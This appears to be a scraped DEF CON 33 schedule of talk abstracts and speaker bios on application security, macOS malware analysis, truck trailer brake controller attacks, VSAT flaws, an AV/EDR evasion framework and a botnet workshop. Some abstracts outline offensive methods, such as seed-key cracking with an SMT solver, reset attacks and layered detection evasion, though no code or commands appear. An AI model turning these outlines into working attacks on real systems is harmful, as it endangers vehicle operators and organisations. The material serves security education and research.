Good developer experience and cyber security, almost sounds like oxymorons together. But, is it really? How can we make both better, together?
We will explore how we can both improve our developer experience and application security together. How application security and the developer experience overlap, and practical steps that we’ve observed to have outsized impact on improving both AppSec and DevEx together, that you can take back to your teams and start doing today.
Note: DCGVR Talks are scheduled 1 hour slots, but the actual presentations can be as short as 30 minutes. Please arrive at the start of the hour.
SpeakerBio: Dan TingDan is an AppSec specialist, and has over a decade of experience in IT and cybersecurity, covering a broad range of specialist technical and leadership roles. Prior to roles, these include roles such as Head of Product, Human-centred Designer, Solutions Architect, Project Manager, Systems Administrator, an AppSec and Product Security educator, a senior security architect, a penetration tester and a data science researcher.
Today, hey leverage their diverse experiences to sherpa and help all roles in engineering teams build safer, more trustworthy, and secure products balancing business, experience, and technical needs. Their contributions to industry include presentation at various security conferences including DCG VR, BSides Melbourne, BSides Brisbane, and Christchurch Hacker Conference, on various security topics and a contributing author to an O'Reilly book on Application Security. But, they are just a nerd learning and sharing knowledge to make our community a safer place.
- ics Calendar file
- ics Calendar file
Payments infrastructure is often built with strong security and reliability guarantees but those guarantees can be undermined by failures in the systems it depends on. In this talk, we examine postmortems from real-world outages where the core payments systems remained robust, yet external or supporting infrastructure such as DNS, authentication services, cloud dependencies, or third-party integrations introduced vulnerabilities during periods of instability
SpeakerBio: Tapan KhilnaniTapan is an engineering manager with deep experience in building and scaling payment systems. With a background that spans global enterprises and early-stage startups, he brings a well-rounded perspective to technical and organizational challenges. He holds an engineering master’s degree, which grounds his practical work in strong technical foundations
- ics Calendar file
As organizations explore AI automation for AppSec, ensuring reliable and trustworthy output becomes critical. This talk examines practical challenges in building AI systems that can consistently interpret security requirements, process engineering documentation, and produce high quality threat models and code scanning results.
We'll explore technical approaches to prevent hallucinations, handle conflicting documentation, normalize AI outputs, and validate assessments against established policies. Drawing from real-world implementation experience, we'll share key patterns for building robust security automation systems that maintain high accuracy while scaling across engineering organizations.
SpeakerBio: Emily Choi-GreeneEmily has been securing AI systems since 2018. She oversaw application security for Amazon's Alexa AI organization and owned data security and privacy at Moveworks (an enterprise AI assistant). She's now the CEO and co-founder of Clearly AI, a YC-backed startup automating security and privacy reviews.
- ics Calendar file
The challenges of synthetic content identification echo many of those faced in information security. This talk explores the lessons we've learned from moving past single-point solutions and embracing a multi-factor, probabilistic approach. We will draw parallels between classic security challenges and the new frontier of content provenance, demonstrating that while signals like watermarks are valuable, a more comprehensive, layered strategy is essential for building a resilient framework to identify AI-generated and manipulated content.
SpeakerBio: Emanuel Gawrieh, R&D Labs Lead at AI Village Senior Security Engineer at Google
- ics Calendar file
When confronted with malicious macOS binaries, analysts typically reach for a disassembler and immerse themselves in the complexities of low-level assembly. But what if this tedious process could be skipped entirely?
While many malware samples are distributed as native macOS binaries (easily run with a simple double-click), they frequently encapsulate scripts hidden within executable wrappers. Leveraging frameworks such as PyInstaller, Appify, Tauri, and Platypus, malware authors embed their scripts with binaries, complicating traditional analysis. Although these frameworks share the goal of producing natively executable binaries, each employs a distinct method to embed scripts, thus necessitating tailored extraction tools and approaches.
Using real-world macOS malware (such as Shlayer, CreativeUpdate, GravityRAT, and many others), we'll first demonstrate how to identify these faux binaries and then how to efficiently extract or reconstruct their embedded scripts, bypassing the disassembler entirely!
References:
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
- ics Calendar file
The Device Lab is highly-collaborative environment where security researchers test medical instruments, applications, and devices in real-time from participating Medical Device Manufacturers. Any potential issues are reported directly to the manufacturer, and coordinated vulnerability disclosures are produced.
As part of their product security programs, their proactive initiatives to test their products, and to enhance the cybersecurity of their medical technologies, select medical device makers are teaming up with the Biohacking Village.
These manufacturers are inviting security researchers to learn and to test their products in dedicated spaces set aside for them. Their staff will answer questions, educate researchers, and triage any potential security issues. Researchers who perform testing should expect to follow the manufacturers’ published coordinated vulnerability disclosure policy and report any potential issues found so they can be addressed. Security researchers must sign the Hippocratic Oath for Hackers and agree to the framework of boundaries and rules of engagement during and post conference engagement.
- ics Calendar file
Blackdagger is a next-gen cybersecurity workflow automation framework built to streamline and accelerate complex operations across DevSecOps, MLOps, MLSecOps, and Continuous Automated Red Teaming (CART). It uses a declarative YAML-based Directed Acyclic Graph (DAG) system to define, visualize, and execute automated pipelines — no heavy scripting required. With a built-in web UI, a containerized red teaming toolkit called Blackcart, and integration with GitHub Actions for OPSEC-friendly task execution, Blackdagger empowers teams to deploy, manage, and scale cyber workflows in real-time. Attendees will see live demos of red team pipelines, stealthy GitHub-based automation, and browser-based workflow execution via the Blackdagger Web Kit. Whether you're defending or attacking, Blackdagger turns security automation into an intuitive, visual experience — backed by real-world NATO and defense applications.
Speakers:Mahmut "ErdemOzgen" Erdem Ozgen,Ata SerenMahmut is a computer engineer from Ankara, Turkey, specializing in software engineering, cybersecurity, ML systems, and DevSecOps. A Bahcesehir University graduate (2015-2020), he has played key roles at HAVELSAN, developing secure DevSecOps pipelines and cybersecurity architectures for Turkish Armed Forces, contributing to national security systems advancement. He has extensive experience with machine learning and LLMs, applying theoretical concepts to practical solutions. As a student research assistant at Istanbul Big Data Education and Research Center, he implemented learning-based algorithms for drone routing and conducted text processing and sentiment analysis. His technical expertise encompasses Python, Go, C/C++, Java, JavaScript, Docker, Kubernetes, Terraform, and blockchain technologies. Fluent in English and Turkish, he has received notable recognition, including first place in the Presidency of Defence Industries Cyber Capstone Projects and a full scholarship from Bahcesehir University. Additionally, he has served on the NATO Locked Shields exercise green team, implementing ML and LLM-based systems, and currently serves as a red team capability leader in the NATO CWIX exercise.
SpeakerBio: Ata SerenAta is a specialized cyber security engineer with expertise in application security, DevSecOps, and penetration testing. Currently pursuing a Master’s degree in Cyber Security at Middle East Technical University, his thesis focuses on static application security testing, tool mechanisms, and innovative approaches in the field. With professional experience at HAVELSAN, he has contributed to significant NATO projects and open-source cybersecurity tools including DevSecOpsBuilder, Blackcart, and Blackdagger. His involvement in the NATO Locked Shields exercise in 2024 and 2025 demonstrates his practical expertise in cyber defense operations at an international level. A recognized voice in the cybersecurity community, he has presented the Blackdagger tool at Black Hat USA, Europe, and Asia conferences alongside his colleague. Most recently, he spoke at CyCon 2025, introducing a new cybersecurity framework to industry professionals. His technical proficiency spans multiple programming languages including Python, Golang, and C/C++, complemented by extensive knowledge of cybersecurity fundamentals, cloud security, and AI/ML approaches to security challenges. He is currently expanding his red teaming capabilities while studying for the OSCP certification from OffSec.
- ics Calendar file
Tanker trailers? Turns out those aren't just big, dumb hunks of metal. They have a powerline network, PLC4TRUCKS, which is unintentionally accessible wirelessly (CVEs 2020-14514 and 2022-26131). We found new trailer brake controllers using diagnostic protocol KWP2000, secured with access control by seed-key (a challenge-response protocol). We'll show how to use Wireshark to analyze the diag. traffic. We'll discuss why randomness is critical for any challenge-response protocol.
We'll cover two ways to bypass this access control: using a SMT solver to crack the routine from a few request-response pairs (automated with AHK), and a classic reset attack that makes seeds entirely predictable. This second way allows for a blind, wireless attack, a finding now recognized as CVE-2024-12054. We'll detail how we ran timing search 'campaigns' with a custom sigrok decoder to PoC it.
The trailer brake controller is also at risk from trailer-installed telematics devices too. We'll show how to use Scapy Automotive's UDS scanner on a faked CAN bus for PLC4TRUCKS (plus modify that for a known seed-key routine) so we can get a picture of that attack surface.
This and the previous CVEs are a result of the heavy vehicle testing we do. We'll share some details of how we do onsite truck tests and how we do bench tests.
SpeakerBio: Ben GardinerBen is a Senior Cybersecurity Research Engineer at the National Motor Freight Traffic Association, Inc. (NMFTA)™ specializing in hardware and low-level software security. He has held security assurance and reversing roles at a global corporation, as well as worked in embedded software and systems engineering roles at several organizations.
Ben has conducted workshops and presentations at numerous cybersecurity events globally, including the CyberTruck Challenge, GENIVI security sessions, Hack in Paris, HackFest, escar USA and DEF CON.
Ben holds a M.Sc. Eng. in Applied Math & Stats from Queen’s University. In addition to speaking on the main stage at DEF CON, Ben is a volunteer at the DEF CON Hardware Hacking Village (DC HHV) and Car Hacking Village (CHV). He is GIAC GPEN and GICSP certified, chair of the SAE TEVEES18A1 Cybersecurity Assurance Testing TF (published J3322), a contributor to several American Trucking Associations (ATA) Technology & Maintenance Council (TMC) task forces, ISO WG11 committees, and a voting member of the SAE Vehicle Electronic Systems Security Committee.
- ics Calendar file
Tactic activity that can run for the length of the village each day. CTF activity where attendees can use Bloodhound Enterprise in a simulated environment to gain flags. CTF windows is 20 mins for each registered user
Speakers:Hugo van den Toorn,Joey DreijerHugo is former Chief Information Security Officer and has now transitioned back to help other organizations understand adversary tradecraft. With over twelve years of experience in the Information Security industry, he has a solid technical and executive background as hands-on security leader.
Hugo has experience with and a keen interest in Social engineering, phishing and physical penetration testing. Nowadays, Hugo takes pride and joy in helping individual team members and the business grow. With a strong technical foundation, Hugo combines his passion for security, teaching and hacking with a drive for continuous improvement and optimization of people, processes and technology.
SpeakerBio: Joey Dreijer
- ics Calendar file
A cyber defense Capture the Flag inspired by a mix of trending nation-state actor kill chains. You are an incident responder tasked to investigate multiple incidents. You will have access to a SIEM and other forensic data; however, just like in real life, these tools have issues you must overcome to uncover what happened.
The CTF challenges contestants to leverage diverse cyber defense skills, including Incident Response, Forensics, and Threat Hunting. Both host and network telemetry are required to solve all the flags.
BTV’s Project Obsidian crew developed the CTF to allow anyone, regardless of skill or knowledge, to participate and sharpen their cyber defense skills. We recommend creating or joining a team if you are new to cyber defense. We highly recommend attending the other BTV Project Obsidian presentations and panels to learn even more about different cyber defense topics.
Attendees will be required to use a laptop, tablet, or mobile device. Prior knowledge of using a SIEM is preferred.
No
- ics Calendar file
And here's how they got away with it? Or, and here's how they got caught? The choice is yours as you join the interactive experience. Choose a team (or be assigned one!) and plot your attack or defence. Part role-playing game, part threat model, and part chaos, the attack unfurls: The attackers try desperately to get out with the cash, the bank tries to stop them, and the police pull together what little clues they have to go on. Can you get away with it? Or will you be spending your life behind bars?
NOTE: This is a limited-capacity session, and will be capped at 25 attendees.
SpeakerBio: Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by HarnessDr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.
- ics Calendar file
Attributing cyber threats to a specific nation-state remains one of the most complex challenges in cybersecurity. Cyber attribution relies on analyzing digital artifacts, infrastructure patterns, and adversary tactics, none of which provide definitive proof on their own. Threat actors continuously evolve, adopting new methodologies and obfuscation techniques that make attribution increasingly difficult. Over the past decade, North Korea’s cyber operations have transformed from rudimentary attacks into highly sophisticated campaigns that rival the capabilities of established cyber powers. Initially, DPRK’s cyber program consisted of loosely organized groups with limited technical capacity, but today, these actors operate under a structured, state-controlled framework with clear strategic objectives. This research presents an in-depth analysis of how DPRK threat actors have adapted, restructured, and collaborated, shedding light on the complexities of nation-state attribution.
SpeakerBio: Seongsu Park, APT Research team, Staff Threat Researcher at ZscalerSeongsu Park(@unpacker) is a passionate researcher on malware research, threat intelligence, and incident response with over a decade of experience in cybersecurity. He has extensive experience in malware researching, evolving attack vectors researching, and threat intelligence with a heavy focus on response to high-skilled North Korea threat actors.
Now he is working in the Zscaler APT Research team as a Staff Threat Researcher and focuses on analyzing and tracking security threats in the APAC region.
- ics Calendar file
Despite their widespread use in maritime and remote communication environments, VSAT systems have not received sufficient attention regarding their security vulnerabilities. Recent incidents, such as the Lab Dookhtegan hacker group's attack on Iranian ship networks and the demonstration of firmware reverse engineering and remote root exploitation targeting VSAT modems (e.g., Newtec MDM2200) at DEFCON, highlight the critical security challenges associated with VSAT systems. Against this backdrop, our research team presents a detailed overview of our ongoing research since 2023, encompassing the collection and re-hosting of VSAT firmware, as well as systematic vulnerability analysis through the ACU web interface. Specifically, we provide an in-depth analysis and demonstration of recently discovered VSAT ACU web vulnerabilities (CVE-2023-44852 ~ CVE-2023-44857). Additionally, we describe the application of experimental testbed environments based on the methodology proposed in the paper "Securing Maritime Autonomous Surface Ships: Cyber Threat Scenarios and Testbed Validation." This research aims to thoroughly analyze the security vulnerabilities and attack potentials inherent in VSAT systems, emphasizing the importance of strengthening maritime cyber security and fostering international collaboration, while providing practical recommendations for policy and technological enhancements.
SpeakerBio: Juwon Cho, Yonsei UniversityJuwon Cho is currently pursuing a Master’s degree in Information Security at Yonsei University, where his research focuses on AI security, particularly jailbreak attacks on large language models. He is actively exploring methods to evaluate and strengthen the robustness of generative AI through adversarial prompting and system-level analysis. He was selected as one of the Top 30 participants in the 12th Best of Best program at KITRI, completing intensive training in security strategy and product development. He also received the Excellent Award at the Chungcheong Cybersecurity Conference in September 2023 for his team’s work on scenario-based analysis of cyber threats in critical infrastructure.
- ics Calendar file
BOAZ (Bypass, Obfuscate, Adapt, Zero-Trust) evasion was inspired by the concept of multi-layered approach which is the evasive version of defence-in-depth first proposed in a presentation at BH USA14. BOAZ was developed to provide greater control over combinations of evasion methods, enabling more granular evaluations against antivirus and EDR. It is designed to bypass before, during, and post execution detections that span signature, heuristic, and behavioural detection mechanisms. BOAZ supports both x86/x64 binary (PE) or raw payload as input and output EXE or DLL. It has been tested on separated Windows 11 Enterprise, Windows 10, and Windows Server 2022 VMs with 14 desktop AVs and 7 EDRs installed including Windows Defender, Norton, BitDefender, Sophos, and ESET. The design of BOAZ evasion is modular, so users can add their own toolset or techniques to the framework. BOAZ is written in C++ and C and uses Python3 as the main linker to integrate all modules. There have been significant improvements implemented since its inception. The new version of the BOAZ evasion tool, set for release at DEF CON 33, will feature three novel threadless process injection primitives, along with newly implemented loaders and behavioural evasion techniques.
SpeakerBio: Thomas "XM20" Xuan MengThomas is a cybersecurity researcher, reverse engineer, and developer with a diverse background in policing, academia, and civil service. He holds a PhD in Computational Engineering, an MPhil in Criminological Research, and a BSc in Mathematics, and was awarded a university medal in Cybersecurity from Edinburgh Napier University.
- ics Calendar file
Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.
SpeakerBio: Drinor Selmanaj, Founder and CTO at SentryDrinor Selmanaj is a cybersecurity frontier with over a decade of paramount experience in penetration testing, cyberterrorism combat, and global privacy amidst NATO representatives, multinational corporations, tech giants, and heads of state. Moreover, he is a prolific investor in the tech scene with several cybersecurity-related companies and initiatives under his name.At Sentry, Drinor leads a global team of cybersecurity researchers while providing cutting-edge penetration testing and other cybersecurity services to unicorn corporations, including some of the Big Four.Likewise, Selmanaj is well-known for his efforts in security education, having trained thousands of students while continuously responding to the chronic cybersecurity talent shortage. His students are renowned professionals employed in leading application security firms and have received multiple recognitions from numerous organizations, including the U.S. Department of Defense.
At Cyber Academy, he has developed state-of-the-art courses covering a variety of topics, ranging from the foundations of cybersecurity to red teaming and adversary emulations. Additionally, Drinor has developed cyber ranges equipped with the latest offensive and defensive scenarios for training the new cybersecurity workforce.As a consultant, he has assessed vulnerabilities, opportunities, and mitigation pathways for critical information infrastructures on a national level, the finance/health sector, and electoral systems. As a result, Drinor found success in providing a clear sight of national cybersecurity while delivering a comprehensive and concrete action plan.Drinor Selmanaj is an award-winning cybersecurity professional, lecturer, public speaker, and executive aspiring to boost innovation, all the while perpetually pursuing excellence and standing one step ahead of cyber threats
- ics Calendar file
- ics Calendar file
- ics Calendar file
Corey Ball is the founder and CEO of hAPI Labs, where he provides penetration testing services. He is the author of Hacking APIs, founder of APIsec University, and has over fifteen years of experience working in IT and cybersecurity. Corey holds the OSCP, CCISO, CISSP, and several other industry certifications.
- ics Calendar file
As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
SpeakerBio: Chris DeCarmenAs a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
- ics Calendar file
As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
SpeakerBio: Chris DeCarmenAs a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
- ics Calendar file
Eugene Lim is a security researcher and white hat hacker. From Amazon to Zoom, he has helped secure applications from a range of vulnerabilities. His work has been featured at top conferences such as Black Hat, DEF CON, and industry publications like WIRED and The Register.
- ics Calendar file
Carey Parker is on a mission to raise the awareness of everyday, non-technical people on the crucially important topics of cybersecurity and privacy. There are plenty of resources for computer geeks (like himself), but is striving to reach the 99% of the population who use the Internet all the time but have no real idea how safe they are nor how to make themselves safer. It might seem like a lost cause, but trust him, it’s not! There are dozens of free and simple things we can all be doing to protect ourselves, our family, and our friends.
SpeakerBio: Carey ParkerCarey Parker is on a mission to raise the awareness of everyday, non-technical people on the crucially important topics of cybersecurity and privacy. There are plenty of resources for computer geeks (like himself), but is striving to reach the 99% of the population who use the Internet all the time but have no real idea how safe they are nor how to make themselves safer. It might seem like a lost cause, but trust him, it’s not! There are dozens of free and simple things we can all be doing to protect ourselves, our family, and our friends.
- ics Calendar file
- ics Calendar file
Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness.
Accepted Payment Methods: Cash, Venmo, and Paypal
SpeakerBio: Laura S. Scherling, EdDLaura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness. Accepted Payment Methods: Cash, Venmo, and Paypal
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
- ics Calendar file
- ics Calendar file
- ics Calendar file
While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
SpeakerBio: Deviant Ollam, Director of Education at Red Team AllianceWhile paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
- ics Calendar file
Please be advised that the author has sent signed copies, but there will be no personal signing on-site.
Audrey is currently a security researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping
Computer and Mashable. She has also presented her research as a speaker at BSides SF and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital, investing in software and cybersecurity startups.
SpeakerBio: Audrey AdelineAudrey is currently a researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping Computer and Mashable. She has also presented as a speaker at RSA, SF BSides and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital.
- ics Calendar file
Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.
With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.
As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.
For more about Garrett visit https://GarrettGee.com
SpeakerBio: Garrett GeeGarrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.
With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.
As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.
- ics Calendar file
A practical guide to hardware hacking.
Join IoT Village for a hands-on workshop where people can learn step-by-step techniques to gain root access on a smart camera. Some of the methods involved are PCB analysis, power analysis, and exploiting debug interfaces to achieve shell access.
- ics Calendar file
Join us for an interactive workshop where we will walk you through the ins and outs of botnet deployment and operation via a command and control web server. Geared towards beginners, this workshop offers a hands-on approach to understanding how botnets function. You’ll also learn an effective defense strategy against the botnet you have created. No experience needed we will give you everything you need!
- ics Calendar file
Back in 2020 the Brazilian Central Bank launched PIX, a real time wire transfer and payment protocol that has been adopted by the Brazilian population, and nowadays PIX represents the most used payment method in the country. However, local cybercriminals quickly adapted and leveraged PIX for malicious activity. Since then, criminal activity in Brazil has ramped, from kidnapping, stealing of mobile phones, to money laundering "on steroids" and targeted banking trojans. Instant wire transfers made fraudulent transactions run faster than the speed of light, and were almost impossible to stop and to recover the stolen funds. A criminals' paradise. In this presentation we will discuss the fraud schemes that were fueled by PIX and the ones that emerged since then, haunting the local population.
SpeakerBio: Anchises Moraes, Cyber Threat intel Lead at APURA Cyber Intelligence SALord Anchises Moraes Brazilborn of the house Hacker, First of His Name, Born in Computer Science, Cybersecurity Work-aholic, Lead of Threat Intel Realm, founder of Security BSides São Paulo, Supreme Chancellor of Garoa Hacker Clube, He for She volunteer at WOMCY (LATAM Women in Cybersecurity), Mente Binária NGO Counselor, Security Specialist and Protector of the Cyber Space realm.
- ics Calendar file
This area will feature guided breach simulation exercises for participants to engage with. There will be two activities, "Breach-the-Hospital" and "Breach-the-Office," based on two LEGO sets. A simulated cyber range will be available for each scenario, providing an exact replica of an enterprise production environment. We will provide a detailed walkthrough of the attack scenarios, including Tools-Techniques-and-Procedures (TTPs) commands and how-to guides, demonstrating how to atatck and breach the hospital's infrastructure or the office environment. This exercise will give participants a clear understanding of how adversaries infiltrate corporate environments.
- ics Calendar file
It was the summer of 2016, and like everyone else, I was out playing Pokémon Go. Except my rural location barely spawned anything interesting. Naturally, I dove into the game's code, reverse engineered its protocol, and built a custom Pokémon scanner.
But the story doesn't end there. One day, a switch was flipped, enabling a fancy new anti-cheating feature that locked out any custom implementations.
In this talk, I'll begin by exploring how mobile games like Pokémon Go handle communication through specialized protocols—and how I replicated that behavior to build a scanner. Then, I'll walk you through a 4-day hacking marathon where I teamed up with a group of like-minded enthusiasts to overcome the anti-cheating mechanism that nearly broke our scanners.
We'll examine how mobile games attempt to thwart such applications, unraveling the anti-cheating mechanism that was deployed by Pokemon Go. We'll explore how we managed, through obfuscated cryptographic functions, unexpected use of smartphone peripherals and hidden protobuf definitions, to break the anti-cheating system and release a publicly available API for the game's protocol.
Almost a decade later, the full story is ready to be told. Join me for an inside look at the anti-cheating mechanisms of online mobile games—and how to hack them.
References:
SpeakerBio: Tal SkvererIn the past decade, Tal turned his hacking hobby into a career. His experience covers reverse engineering, malware analysis, embedded security, web hacking, cryptography, and computational complexity. He also teaches a biannual workshop on assembly, reverse engineering x86/x64, and blackbox research.
Tal hold an M.Sc. in Theoretical Computer Science from the Weizmann Institute.
Currently, Tal is the Head of Research at Astrix Security, where, among other things, he discovers vulnerabilities in how cloud providers implement connectivity between (and by) non-human identities.
Some of things Tal did in a past: Hacked vehicle infotainment systems at his previous job Was a part of the “Unknown6” research group that broke PokemonGo’s anti-cheating system in 2016. Turned a OnePlus 5T whose screen he accidentally broke into an ad blocker for my home network, as well as a meta search engine focused on ultimate privacy. Presented at several conferences including DEFCON, RSAC, BSides, and OWASP chapters. Conducted an open-heart surgery on a (1 month off warranty) Nintendo Switch to replace a defective part, which highlights the importance of the “Right to Repair” movement.
- ics Calendar file
Trying to break into cybersecurity? Forget the hype. This panel cuts through the noise to show you what actually works: what roles are out there, what skills and certs are worth your time, how to build a real resume, and how to find your people in the community. We’ll talk job hunting, self-study, mentorship, influencers (the good and the grifty), and how to avoid wasting time and money. Ends with an open Q&A. No gatekeeping. No fluff.
Speakers:Rosie "Lady Cyber Rosie" Anderson,Tib3rius,Jayson E. StreetRosie Anderson is Head of Strategic Solutions for th4ts3cur1ty.company AKA Magical Genie Person. Having previously spent two decades talking to businesses to solve their hiring challenges, and helping people to break into cyber security as a recruiter, Rosie now uses those skills to help businesses solve their cybersecurity challenges. Rosie also founded BSides Lancashire, is a Director of BSides Leeds and restarted the Manchester 2600 Hacker Community, the only 2600 to be run by two women in its 40 year history. She was awarded Most Inspiring Woman in Cyber Security for 2024 and Cyber Newcomer for 2025.
Rosie has been a mentor for Capslock a cyber training programme for over two years, and is also part of the Ethical Council for Hacking Games. Giving back is important to her, and she loves the pay-it-forward mentality.
SpeakerBio: Tib3rius, Cybersecurity Content CreatorTib3rius is a professional penetration tester who specializes in web application hacking, though his background also includes network penetration testing. He is OSCP certified, and likes developing new tools for penetration testing, mostly in Python. He helps run an OSCP prep discord server, and enjoys passing on his knowledge to students who have a passion for information security.
SpeakerBio: Jayson E. Street, Chief Adversarial Officer at Secure YetiJayson E. Street referred to in the past as: a "notorious hacker" by FOX25 Boston, "World Class Hacker" by National Geographic Breakthrough Series, and described as a "paunchy hacker" by Rolling Stone Magazine. He however prefers if people refer to him simply as a Hacker, Helper & Human.
He is the Chief Adversarial Officer at Secure Yeti and the author of the "Dissecting the hack: Series" (which is currently required reading at 5 colleges in 3 countries that he knows of). Jayson is also the DEF CON Groups Global Ambassador. He's spoken at DEF CON, DEF CON China, GRRCon, SAINTCON & at several other CONs & colleges on a variety of Information Security subjects. He was also a guest lecturer for the Beijing Institute of Technology for 10 years.
He loves to explore the world & networks as much as he can. He has successfully robbed banks, hotels, government facilities, Biochemical companies, etc. on five continents (Only successfully robbing the wrong bank in Lebanon once, all others he was supposed to)!
He is a highly carbonated speaker who has partaken of Pizza from Bulgaria to Brazil & China to The Canary Islands. He does not expect anybody to still be reading this far, but if they are please note he was proud to be chosen as one of Time's persons of the year for 2006.
- ics Calendar file
